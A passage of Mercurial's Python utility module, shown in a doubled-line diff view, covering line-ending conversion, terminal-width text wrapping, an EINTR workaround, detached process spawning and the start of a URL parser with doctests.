2715 _eolre = remod.compile(br'\r*\n')
2715 _eolre = remod.compile(br'\r*\n')
2716
2716
2717 def tolf(s):
2717 def tolf(s):
2718 return _eolre.sub('\n', s)
2718 return _eolre.sub('\n', s)
2719
2719
2720 def tocrlf(s):
2720 def tocrlf(s):
2721 return _eolre.sub('\r\n', s)
2721 return _eolre.sub('\r\n', s)
2722
2722
2723 if pycompat.oslinesep == '\r\n':
2723 if pycompat.oslinesep == '\r\n':
2724 tonativeeol = tocrlf
2724 tonativeeol = tocrlf
2725 fromnativeeol = tolf
2725 fromnativeeol = tolf
2726 else:
2726 else:
2727 tonativeeol = pycompat.identity
2727 tonativeeol = pycompat.identity
2728 fromnativeeol = pycompat.identity
2728 fromnativeeol = pycompat.identity
2729
2729
2730 def escapestr(s):
2730 def escapestr(s):
2731 # call underlying function of s.encode('string_escape') directly for
2731 # call underlying function of s.encode('string_escape') directly for
2732 # Python 3 compatibility
2732 # Python 3 compatibility
2733 return codecs.escape_encode(s)[0]
2733 return codecs.escape_encode(s)[0]
2734
2734
2735 def unescapestr(s):
2735 def unescapestr(s):
2736 return codecs.escape_decode(s)[0]
2736 return codecs.escape_decode(s)[0]
2737
2737
2738 def forcebytestr(obj):
2738 def forcebytestr(obj):
2739 """Portably format an arbitrary object (e.g. exception) into a byte
2739 """Portably format an arbitrary object (e.g. exception) into a byte
2740 string."""
2740 string."""
2741 try:
2741 try:
2742 return pycompat.bytestr(obj)
2742 return pycompat.bytestr(obj)
2743 except UnicodeEncodeError:
2743 except UnicodeEncodeError:
2744 # non-ascii string, may be lossy
2744 # non-ascii string, may be lossy
2745 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2745 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2746
2746
2747 def uirepr(s):
2747 def uirepr(s):
2748 # Avoid double backslash in Windows path repr()
2748 # Avoid double backslash in Windows path repr()
2749 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2749 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2750
2750
2751 # delay import of textwrap
2751 # delay import of textwrap
2752 def MBTextWrapper(**kwargs):
2752 def MBTextWrapper(**kwargs):
2753 class tw(textwrap.TextWrapper):
2753 class tw(textwrap.TextWrapper):
2754 """
2754 """
2755 Extend TextWrapper for width-awareness.
2755 Extend TextWrapper for width-awareness.
2756
2756
2757 Neither number of 'bytes' in any encoding nor 'characters' is
2757 Neither number of 'bytes' in any encoding nor 'characters' is
2758 appropriate to calculate terminal columns for specified string.
2758 appropriate to calculate terminal columns for specified string.
2759
2759
2760 Original TextWrapper implementation uses built-in 'len()' directly,
2760 Original TextWrapper implementation uses built-in 'len()' directly,
2761 so overriding is needed to use width information of each characters.
2761 so overriding is needed to use width information of each characters.
2762
2762
2763 In addition, characters classified into 'ambiguous' width are
2763 In addition, characters classified into 'ambiguous' width are
2764 treated as wide in East Asian area, but as narrow in other.
2764 treated as wide in East Asian area, but as narrow in other.
2765
2765
2766 This requires use decision to determine width of such characters.
2766 This requires use decision to determine width of such characters.
2767 """
2767 """
2768 def _cutdown(self, ucstr, space_left):
2768 def _cutdown(self, ucstr, space_left):
2769 l = 0
2769 l = 0
2770 colwidth = encoding.ucolwidth
2770 colwidth = encoding.ucolwidth
2771 for i in xrange(len(ucstr)):
2771 for i in xrange(len(ucstr)):
2772 l += colwidth(ucstr[i])
2772 l += colwidth(ucstr[i])
2773 if space_left < l:
2773 if space_left < l:
2774 return (ucstr[:i], ucstr[i:])
2774 return (ucstr[:i], ucstr[i:])
2775 return ucstr, ''
2775 return ucstr, ''
2776
2776
2777 # overriding of base class
2777 # overriding of base class
2778 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2778 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2779 space_left = max(width - cur_len, 1)
2779 space_left = max(width - cur_len, 1)
2780
2780
2781 if self.break_long_words:
2781 if self.break_long_words:
2782 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2782 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2783 cur_line.append(cut)
2783 cur_line.append(cut)
2784 reversed_chunks[-1] = res
2784 reversed_chunks[-1] = res
2785 elif not cur_line:
2785 elif not cur_line:
2786 cur_line.append(reversed_chunks.pop())
2786 cur_line.append(reversed_chunks.pop())
2787
2787
2788 # this overriding code is imported from TextWrapper of Python 2.6
2788 # this overriding code is imported from TextWrapper of Python 2.6
2789 # to calculate columns of string by 'encoding.ucolwidth()'
2789 # to calculate columns of string by 'encoding.ucolwidth()'
2790 def _wrap_chunks(self, chunks):
2790 def _wrap_chunks(self, chunks):
2791 colwidth = encoding.ucolwidth
2791 colwidth = encoding.ucolwidth
2792
2792
2793 lines = []
2793 lines = []
2794 if self.width <= 0:
2794 if self.width <= 0:
2795 raise ValueError("invalid width %r (must be > 0)" % self.width)
2795 raise ValueError("invalid width %r (must be > 0)" % self.width)
2796
2796
2797 # Arrange in reverse order so items can be efficiently popped
2797 # Arrange in reverse order so items can be efficiently popped
2798 # from a stack of chucks.
2798 # from a stack of chucks.
2799 chunks.reverse()
2799 chunks.reverse()
2800
2800
2801 while chunks:
2801 while chunks:
2802
2802
2803 # Start the list of chunks that will make up the current line.
2803 # Start the list of chunks that will make up the current line.
2804 # cur_len is just the length of all the chunks in cur_line.
2804 # cur_len is just the length of all the chunks in cur_line.
2805 cur_line = []
2805 cur_line = []
2806 cur_len = 0
2806 cur_len = 0
2807
2807
2808 # Figure out which static string will prefix this line.
2808 # Figure out which static string will prefix this line.
2809 if lines:
2809 if lines:
2810 indent = self.subsequent_indent
2810 indent = self.subsequent_indent
2811 else:
2811 else:
2812 indent = self.initial_indent
2812 indent = self.initial_indent
2813
2813
2814 # Maximum width for this line.
2814 # Maximum width for this line.
2815 width = self.width - len(indent)
2815 width = self.width - len(indent)
2816
2816
2817 # First chunk on line is whitespace -- drop it, unless this
2817 # First chunk on line is whitespace -- drop it, unless this
2818 # is the very beginning of the text (i.e. no lines started yet).
2818 # is the very beginning of the text (i.e. no lines started yet).
2819 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2819 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2820 del chunks[-1]
2820 del chunks[-1]
2821
2821
2822 while chunks:
2822 while chunks:
2823 l = colwidth(chunks[-1])
2823 l = colwidth(chunks[-1])
2824
2824
2825 # Can at least squeeze this chunk onto the current line.
2825 # Can at least squeeze this chunk onto the current line.
2826 if cur_len + l <= width:
2826 if cur_len + l <= width:
2827 cur_line.append(chunks.pop())
2827 cur_line.append(chunks.pop())
2828 cur_len += l
2828 cur_len += l
2829
2829
2830 # Nope, this line is full.
2830 # Nope, this line is full.
2831 else:
2831 else:
2832 break
2832 break
2833
2833
2834 # The current line is full, and the next chunk is too big to
2834 # The current line is full, and the next chunk is too big to
2835 # fit on *any* line (not just this one).
2835 # fit on *any* line (not just this one).
2836 if chunks and colwidth(chunks[-1]) > width:
2836 if chunks and colwidth(chunks[-1]) > width:
2837 self._handle_long_word(chunks, cur_line, cur_len, width)
2837 self._handle_long_word(chunks, cur_line, cur_len, width)
2838
2838
2839 # If the last chunk on this line is all whitespace, drop it.
2839 # If the last chunk on this line is all whitespace, drop it.
2840 if (self.drop_whitespace and
2840 if (self.drop_whitespace and
2841 cur_line and cur_line[-1].strip() == r''):
2841 cur_line and cur_line[-1].strip() == r''):
2842 del cur_line[-1]
2842 del cur_line[-1]
2843
2843
2844 # Convert current line back to a string and store it in list
2844 # Convert current line back to a string and store it in list
2845 # of all lines (return value).
2845 # of all lines (return value).
2846 if cur_line:
2846 if cur_line:
2847 lines.append(indent + r''.join(cur_line))
2847 lines.append(indent + r''.join(cur_line))
2848
2848
2849 return lines
2849 return lines
2850
2850
2851 global MBTextWrapper
2851 global MBTextWrapper
2852 MBTextWrapper = tw
2852 MBTextWrapper = tw
2853 return tw(**kwargs)
2853 return tw(**kwargs)
2854
2854
2855 def wrap(line, width, initindent='', hangindent=''):
2855 def wrap(line, width, initindent='', hangindent=''):
2856 maxindent = max(len(hangindent), len(initindent))
2856 maxindent = max(len(hangindent), len(initindent))
2857 if width <= maxindent:
2857 if width <= maxindent:
2858 # adjust for weird terminal size
2858 # adjust for weird terminal size
2859 width = max(78, maxindent + 1)
2859 width = max(78, maxindent + 1)
2860 line = line.decode(pycompat.sysstr(encoding.encoding),
2860 line = line.decode(pycompat.sysstr(encoding.encoding),
2861 pycompat.sysstr(encoding.encodingmode))
2861 pycompat.sysstr(encoding.encodingmode))
2862 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2862 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2863 pycompat.sysstr(encoding.encodingmode))
2863 pycompat.sysstr(encoding.encodingmode))
2864 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2864 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2865 pycompat.sysstr(encoding.encodingmode))
2865 pycompat.sysstr(encoding.encodingmode))
2866 wrapper = MBTextWrapper(width=width,
2866 wrapper = MBTextWrapper(width=width,
2867 initial_indent=initindent,
2867 initial_indent=initindent,
2868 subsequent_indent=hangindent)
2868 subsequent_indent=hangindent)
2869 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2869 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2870
2870
2871 if (pyplatform.python_implementation() == 'CPython' and
2871 if (pyplatform.python_implementation() == 'CPython' and
2872 sys.version_info < (3, 0)):
2872 sys.version_info < (3, 0)):
2873 # There is an issue in CPython that some IO methods do not handle EINTR
2873 # There is an issue in CPython that some IO methods do not handle EINTR
2874 # correctly. The following table shows what CPython version (and functions)
2874 # correctly. The following table shows what CPython version (and functions)
2875 # are affected (buggy: has the EINTR bug, okay: otherwise):
2875 # are affected (buggy: has the EINTR bug, okay: otherwise):
2876 #
2876 #
2877 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2877 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2878 # --------------------------------------------------
2878 # --------------------------------------------------
2879 # fp.__iter__ | buggy | buggy | okay
2879 # fp.__iter__ | buggy | buggy | okay
2880 # fp.read* | buggy | okay [1] | okay
2880 # fp.read* | buggy | okay [1] | okay
2881 #
2881 #
2882 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2882 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2883 #
2883 #
2884 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2884 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2885 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2885 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2886 #
2886 #
2887 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2887 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2888 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2888 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2889 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2889 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2890 # fp.__iter__ but not other fp.read* methods.
2890 # fp.__iter__ but not other fp.read* methods.
2891 #
2891 #
2892 # On modern systems like Linux, the "read" syscall cannot be interrupted
2892 # On modern systems like Linux, the "read" syscall cannot be interrupted
2893 # when reading "fast" files like on-disk files. So the EINTR issue only
2893 # when reading "fast" files like on-disk files. So the EINTR issue only
2894 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2894 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2895 # files approximately as "fast" files and use the fast (unsafe) code path,
2895 # files approximately as "fast" files and use the fast (unsafe) code path,
2896 # to minimize the performance impact.
2896 # to minimize the performance impact.
2897 if sys.version_info >= (2, 7, 4):
2897 if sys.version_info >= (2, 7, 4):
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 def _safeiterfile(fp):
2899 def _safeiterfile(fp):
2900 return iter(fp.readline, '')
2900 return iter(fp.readline, '')
2901 else:
2901 else:
2902 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2902 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2903 # note: this may block longer than necessary because of bufsize.
2903 # note: this may block longer than necessary because of bufsize.
2904 def _safeiterfile(fp, bufsize=4096):
2904 def _safeiterfile(fp, bufsize=4096):
2905 fd = fp.fileno()
2905 fd = fp.fileno()
2906 line = ''
2906 line = ''
2907 while True:
2907 while True:
2908 try:
2908 try:
2909 buf = os.read(fd, bufsize)
2909 buf = os.read(fd, bufsize)
2910 except OSError as ex:
2910 except OSError as ex:
2911 # os.read only raises EINTR before any data is read
2911 # os.read only raises EINTR before any data is read
2912 if ex.errno == errno.EINTR:
2912 if ex.errno == errno.EINTR:
2913 continue
2913 continue
2914 else:
2914 else:
2915 raise
2915 raise
2916 line += buf
2916 line += buf
2917 if '\n' in buf:
2917 if '\n' in buf:
2918 splitted = line.splitlines(True)
2918 splitted = line.splitlines(True)
2919 line = ''
2919 line = ''
2920 for l in splitted:
2920 for l in splitted:
2921 if l[-1] == '\n':
2921 if l[-1] == '\n':
2922 yield l
2922 yield l
2923 else:
2923 else:
2924 line = l
2924 line = l
2925 if not buf:
2925 if not buf:
2926 break
2926 break
2927 if line:
2927 if line:
2928 yield line
2928 yield line
2929
2929
2930 def iterfile(fp):
2930 def iterfile(fp):
2931 fastpath = True
2931 fastpath = True
2932 if type(fp) is file:
2932 if type(fp) is file:
2933 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2933 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2934 if fastpath:
2934 if fastpath:
2935 return fp
2935 return fp
2936 else:
2936 else:
2937 return _safeiterfile(fp)
2937 return _safeiterfile(fp)
2938 else:
2938 else:
2939 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2939 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2940 def iterfile(fp):
2940 def iterfile(fp):
2941 return fp
2941 return fp
2942
2942
2943 def iterlines(iterator):
2943 def iterlines(iterator):
2944 for chunk in iterator:
2944 for chunk in iterator:
2945 for line in chunk.splitlines():
2945 for line in chunk.splitlines():
2946 yield line
2946 yield line
2947
2947
2948 def expandpath(path):
2948 def expandpath(path):
2949 return os.path.expanduser(os.path.expandvars(path))
2949 return os.path.expanduser(os.path.expandvars(path))
2950
2950
2951 def hgcmd():
2951 def hgcmd():
2952 """Return the command used to execute current hg
2952 """Return the command used to execute current hg
2953
2953
2954 This is different from hgexecutable() because on Windows we want
2954 This is different from hgexecutable() because on Windows we want
2955 to avoid things opening new shell windows like batch files, so we
2955 to avoid things opening new shell windows like batch files, so we
2956 get either the python call or current executable.
2956 get either the python call or current executable.
2957 """
2957 """
2958 if mainfrozen():
2958 if mainfrozen():
2959 if getattr(sys, 'frozen', None) == 'macosx_app':
2959 if getattr(sys, 'frozen', None) == 'macosx_app':
2960 # Env variable set by py2app
2960 # Env variable set by py2app
2961 return [encoding.environ['EXECUTABLEPATH']]
2961 return [encoding.environ['EXECUTABLEPATH']]
2962 else:
2962 else:
2963 return [pycompat.sysexecutable]
2963 return [pycompat.sysexecutable]
2964 return gethgcmd()
2964 return gethgcmd()
2965
2965
2966 def rundetached(args, condfn):
2966 def rundetached(args, condfn):
2967 """Execute the argument list in a detached process.
2967 """Execute the argument list in a detached process.
2968
2968
2969 condfn is a callable which is called repeatedly and should return
2969 condfn is a callable which is called repeatedly and should return
2970 True once the child process is known to have started successfully.
2970 True once the child process is known to have started successfully.
2971 At this point, the child process PID is returned. If the child
2971 At this point, the child process PID is returned. If the child
2972 process fails to start or finishes before condfn() evaluates to
2972 process fails to start or finishes before condfn() evaluates to
2973 True, return -1.
2973 True, return -1.
2974 """
2974 """
2975 # Windows case is easier because the child process is either
2975 # Windows case is easier because the child process is either
2976 # successfully starting and validating the condition or exiting
2976 # successfully starting and validating the condition or exiting
2977 # on failure. We just poll on its PID. On Unix, if the child
2977 # on failure. We just poll on its PID. On Unix, if the child
2978 # process fails to start, it will be left in a zombie state until
2978 # process fails to start, it will be left in a zombie state until
2979 # the parent wait on it, which we cannot do since we expect a long
2979 # the parent wait on it, which we cannot do since we expect a long
2980 # running process on success. Instead we listen for SIGCHLD telling
2980 # running process on success. Instead we listen for SIGCHLD telling
2981 # us our child process terminated.
2981 # us our child process terminated.
2982 terminated = set()
2982 terminated = set()
2983 def handler(signum, frame):
2983 def handler(signum, frame):
2984 terminated.add(os.wait())
2984 terminated.add(os.wait())
2985 prevhandler = None
2985 prevhandler = None
2986 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2986 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2987 if SIGCHLD is not None:
2987 if SIGCHLD is not None:
2988 prevhandler = signal.signal(SIGCHLD, handler)
2988 prevhandler = signal.signal(SIGCHLD, handler)
2989 try:
2989 try:
2990 pid = spawndetached(args)
2990 pid = spawndetached(args)
2991 while not condfn():
2991 while not condfn():
2992 if ((pid in terminated or not testpid(pid))
2992 if ((pid in terminated or not testpid(pid))
2993 and not condfn()):
2993 and not condfn()):
2994 return -1
2994 return -1
2995 time.sleep(0.1)
2995 time.sleep(0.1)
2996 return pid
2996 return pid
2997 finally:
2997 finally:
2998 if prevhandler is not None:
2998 if prevhandler is not None:
2999 signal.signal(signal.SIGCHLD, prevhandler)
2999 signal.signal(signal.SIGCHLD, prevhandler)
3000
3000
3001 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3001 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3002 """Return the result of interpolating items in the mapping into string s.
3002 """Return the result of interpolating items in the mapping into string s.
3003
3003
3004 prefix is a single character string, or a two character string with
3004 prefix is a single character string, or a two character string with
3005 a backslash as the first character if the prefix needs to be escaped in
3005 a backslash as the first character if the prefix needs to be escaped in
3006 a regular expression.
3006 a regular expression.
3007
3007
3008 fn is an optional function that will be applied to the replacement text
3008 fn is an optional function that will be applied to the replacement text
3009 just before replacement.
3009 just before replacement.
3010
3010
3011 escape_prefix is an optional flag that allows using doubled prefix for
3011 escape_prefix is an optional flag that allows using doubled prefix for
3012 its escaping.
3012 its escaping.
3013 """
3013 """
3014 fn = fn or (lambda s: s)
3014 fn = fn or (lambda s: s)
3015 patterns = '|'.join(mapping.keys())
3015 patterns = '|'.join(mapping.keys())
3016 if escape_prefix:
3016 if escape_prefix:
3017 patterns += '|' + prefix
3017 patterns += '|' + prefix
3018 if len(prefix) > 1:
3018 if len(prefix) > 1:
3019 prefix_char = prefix[1:]
3019 prefix_char = prefix[1:]
3020 else:
3020 else:
3021 prefix_char = prefix
3021 prefix_char = prefix
3022 mapping[prefix_char] = prefix_char
3022 mapping[prefix_char] = prefix_char
3023 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3023 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3024 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3024 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3025
3025
3026 def getport(port):
3026 def getport(port):
3027 """Return the port for a given network service.
3027 """Return the port for a given network service.
3028
3028
3029 If port is an integer, it's returned as is. If it's a string, it's
3029 If port is an integer, it's returned as is. If it's a string, it's
3030 looked up using socket.getservbyname(). If there's no matching
3030 looked up using socket.getservbyname(). If there's no matching
3031 service, error.Abort is raised.
3031 service, error.Abort is raised.
3032 """
3032 """
3033 try:
3033 try:
3034 return int(port)
3034 return int(port)
3035 except ValueError:
3035 except ValueError:
3036 pass
3036 pass
3037
3037
3038 try:
3038 try:
3039 return socket.getservbyname(pycompat.sysstr(port))
3039 return socket.getservbyname(pycompat.sysstr(port))
3040 except socket.error:
3040 except socket.error:
3041 raise Abort(_("no port number associated with service '%s'") % port)
3041 raise Abort(_("no port number associated with service '%s'") % port)
3042
3042
3043 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3043 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3044 '0': False, 'no': False, 'false': False, 'off': False,
3044 '0': False, 'no': False, 'false': False, 'off': False,
3045 'never': False}
3045 'never': False}
3046
3046
3047 def parsebool(s):
3047 def parsebool(s):
3048 """Parse s into a boolean.
3048 """Parse s into a boolean.
3049
3049
3050 If s is not a valid boolean, returns None.
3050 If s is not a valid boolean, returns None.
3051 """
3051 """
3052 return _booleans.get(s.lower(), None)
3052 return _booleans.get(s.lower(), None)
3053
3053
3054 _hextochr = dict((a + b, chr(int(a + b, 16)))
3054 _hextochr = dict((a + b, chr(int(a + b, 16)))
3055 for a in string.hexdigits for b in string.hexdigits)
3055 for a in string.hexdigits for b in string.hexdigits)
3056
3056
3057 class url(object):
3057 class url(object):
3058 r"""Reliable URL parser.
3058 r"""Reliable URL parser.
3059
3059
3060 This parses URLs and provides attributes for the following
3060 This parses URLs and provides attributes for the following
3061 components:
3061 components:
3062
3062
3063 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3063 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3064
3064
3065 Missing components are set to None. The only exception is
3065 Missing components are set to None. The only exception is
3066 fragment, which is set to '' if present but empty.
3066 fragment, which is set to '' if present but empty.
3067
3067
3068 If parsefragment is False, fragment is included in query. If
3068 If parsefragment is False, fragment is included in query. If
3069 parsequery is False, query is included in path. If both are
3069 parsequery is False, query is included in path. If both are
3070 False, both fragment and query are included in path.
3070 False, both fragment and query are included in path.
3071
3071
3072 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3072 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3073
3073
3074 Note that for backward compatibility reasons, bundle URLs do not
3074 Note that for backward compatibility reasons, bundle URLs do not
3075 take host names. That means 'bundle://../' has a path of '../'.
3075 take host names. That means 'bundle://../' has a path of '../'.
3076
3076
3077 Examples:
3077 Examples:
3078
3078
3079 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3079 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3080 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3080 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3081 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3081 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3082 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3082 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3083 >>> url(b'file:///home/joe/repo')
3083 >>> url(b'file:///home/joe/repo')
3084 <url scheme: 'file', path: '/home/joe/repo'>
3084 <url scheme: 'file', path: '/home/joe/repo'>
3085 >>> url(b'file:///c:/temp/foo/')
3085 >>> url(b'file:///c:/temp/foo/')
3086 <url scheme: 'file', path: 'c:/temp/foo/'>
3086 <url scheme: 'file', path: 'c:/temp/foo/'>
3087 >>> url(b'bundle:foo')
3087 >>> url(b'bundle:foo')
3088 <url scheme: 'bundle', path: 'foo'>
3088 <url scheme: 'bundle', path: 'foo'>
3089 >>> url(b'bundle://../foo')
3089 >>> url(b'bundle://../foo')
3090 <url scheme: 'bundle', path: '../foo'>
3090 <url scheme: 'bundle', path: '../foo'>
3091 >>> url(br'c:\foo\bar')
3091 >>> url(br'c:\foo\bar')
3092 <url path: 'c:\\foo\\bar'>
3092 <url path: 'c:\\foo\\bar'>
3093 >>> url(br'\\blah\blah\blah')
3093 >>> url(br'\\blah\blah\blah')
3094 <url path: '\\\\blah\\blah\\blah'>
3094 <url path: '\\\\blah\\blah\\blah'>
3095 >>> url(br'\\blah\blah\blah#baz')
3095 >>> url(br'\\blah\blah\blah#baz')
3096 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3096 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3097 >>> url(br'file:///C:\users\me')
3097 >>> url(br'file:///C:\users\me')
3098 <url scheme: 'file', path: 'C:\\users\\me'>
3098 <url scheme: 'file', path: 'C:\\users\\me'>
3099
3099
3100 Authentication credentials:
3100 Authentication credentials:
3101
3101
3102 >>> url(b'ssh://joe:xyz@x/repo')
3102 >>> url(b'ssh://joe:xyz@x/repo')
3103 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3103 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3104 >>> url(b'ssh://joe@x/repo')
3104 >>> url(b'ssh://joe@x/repo')
3105 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3105 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3106
3106
3107 Query strings and fragments:
3107 Query strings and fragments:
3108
3108
3109 >>> url(b'http://host/a?b#c')
3109 >>> url(b'http://host/a?b#c')
3110 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3110 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3111 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3111 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3112 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3112 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3113
3113
3114 Empty path:
3114 Empty path:
3115
3115
3116 >>> url(b'')
3116 >>> url(b'')
3117 <url path: ''>
3117 <url path: ''>
3118 >>> url(b'#a')
3118 >>> url(b'#a')
3119 <url path: '', fragment: 'a'>
3119 <url path: '', fragment: 'a'>
3120 >>> url(b'http://host/')
3120 >>> url(b'http://host/')
3121 <url scheme: 'http', host: 'host', path: ''>
3121 <url scheme: 'http', host: 'host', path: ''>
3122 >>> url(b'http://host/#a')
3122 >>> url(b'http://host/#a')
3123 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3123 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3124
3124
3125 Only scheme:
3125 Only scheme:
3126
3126
3127 >>> url(b'http:')
3127 >>> url(b'http:')
3128 <url scheme: 'http'>
3128 <url scheme: 'http'>
3129 """
3129 """
3130
3130
3131 _safechars = "!~*'()+"
3131 _safechars = "!~*'()+"
3132 _safepchars = "/!~*'()+:\\"
3132 _safepchars = "/!~*'()+:\\"
3133 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3133 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3134
3134
3135 def __init__(self, path, parsequery=True, parsefragment=True):
3135 def __init__(self, path, parsequery=True, parsefragment=True):
3136 # We slowly chomp away at path until we have only the path left
3136 # We slowly chomp away at path until we have only the path left
3137 self.scheme = self.user = self.passwd = self.host = None
3137 self.scheme = self.user = self.passwd = self.host = None
3138 self.port = self.path = self.query = self.fragment = None
3138 self.port = self.path = self.query = self.fragment = None
3139 self._localpath = True
3139 self._localpath = True
3140 self._hostport = ''
3140 self._hostport = ''
3141 self._origpath = path
3141 self._origpath = path
3142
3142
3143 if parsefragment and '#' in path:
3143 if parsefragment and '#' in path:
3144 path, self.fragment = path.split('#', 1)
3144 path, self.fragment = path.split('#', 1)
3145
3145
3146 # special case for Windows drive letters and UNC paths
3146 # special case for Windows drive letters and UNC paths
3147 if hasdriveletter(path) or path.startswith('\\\\'):
3147 if hasdriveletter(path) or path.startswith('\\\\'):
3148 self.path = path
3148 self.path = path
3149 return
3149 return
3150
3150
3151 # For compatibility reasons, we can't handle bundle paths as
3151 # For compatibility reasons, we can't handle bundle paths as
3152 # normal URLS
3152 # normal URLS
3153 if path.startswith('bundle:'):
3153 if path.startswith('bundle:'):
3154 self.scheme = 'bundle'
3154 self.scheme = 'bundle'
3155 path = path[7:]
3155 path = path[7:]
3156 if path.startswith('//'):
3156 if path.startswith('//'):
3157 path = path[2:]
3157 path = path[2:]
3158 self.path = path
3158 self.path = path
3159 return
3159 return
3160
3160
3161 if self._matchscheme(path):
3161 if self._matchscheme(path):
3162 parts = path.split(':', 1)
3162 parts = path.split(':', 1)
3163 if parts[0]:
3163 if parts[0]:
3164 self.scheme, path = parts
3164 self.scheme, path = parts
3165 self._localpath = False
3165 self._localpath = False
3166
3166
3167 if not path:
3167 if not path:
3168 path = None
3168 path = None
3169 if self._localpath:
3169 if self._localpath:
3170 self.path = ''
3170 self.path = ''
3171 return
3171 return
3172 else:
3172 else:
3173 if self._localpath:
3173 if self._localpath:
3174 self.path = path
3174 self.path = path
3175 return
3175 return
3176
3176
3177 if parsequery and '?' in path:
3177 if parsequery and '?' in path:
3178 path, self.query = path.split('?', 1)
3178 path, self.query = path.split('?', 1)
3179 if not path:
3179 if not path:
3180 path = None
3180 path = None
3181 if not self.query:
3181 if not self.query:
3182 self.query = None
3182 self.query = None
3183
3183
3184 # // is required to specify a host/authority
3184 # // is required to specify a host/authority
3185 if path and path.startswith('//'):
3185 if path and path.startswith('//'):
3186 parts = path[2:].split('/', 1)
3186 parts = path[2:].split('/', 1)
3187 if len(parts) > 1:
3187 if len(parts) > 1:
3188 self.host, path = parts
3188 self.host, path = parts
3189 else:
3189 else:
3190 self.host = parts[0]
3190 self.host = parts[0]
3191 path = None
3191 path = None
3192 if not self.host:
3192 if not self.host:
3193 self.host = None
3193 self.host = None
3194 # path of file:///d is /d
3194 # path of file:///d is /d
3195 # path of file:///d:/ is d:/, not /d:/
3195 # path of file:///d:/ is d:/, not /d:/
3196 if path and not hasdriveletter(path):
3196 if path and not hasdriveletter(path):
3197 path = '/' + path
3197 path = '/' + path
3198
3198
3199 if self.host and '@' in self.host:
3199 if self.host and '@' in self.host:
3200 self.user, self.host = self.host.rsplit('@', 1)
3200 self.user, self.host = self.host.rsplit('@', 1)
3201 if ':' in self.user:
